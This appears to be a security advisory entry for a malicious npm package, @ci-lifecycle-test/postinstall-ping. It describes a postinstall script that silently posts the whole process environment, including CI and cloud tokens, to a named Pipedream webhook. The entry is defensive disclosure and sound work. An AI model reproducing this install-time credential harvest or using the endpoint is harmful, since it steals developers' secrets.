Vulnerability
Malicious code in @ci-lifecycle-test/postinstall-ping (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (75c160ad40a237c1e682c696ebd0aec2861ca072f47bd5b725bc80f7f95ed509) The package's postinstall lifecycle script (postinstall.js) executes automatically on `npm install` and POSTs the JSON-serialized contents of the entire process.env to https://eoarlb39lor5s7x.m.pipedream.net. The fetch is wired with `.catch(() => {})` so the exfiltration fails silently and produces no installer-visible error. On CI runners and developer machines, process.env routinely holds high-value secrets (GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID/SECRET_ACCESS_KEY, CI provider tokens, arbitrary deploy credentials), all of which are shipped to the attacker-controlled Pipedream webhook in a single bulk dump. There is no license-check, telemetry-disclosure, or other legitimate reason to enumerate the entire environment; the indiscriminate serialization combined with a third-party webhook destination is the canonical install-time credential-harvest shape.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence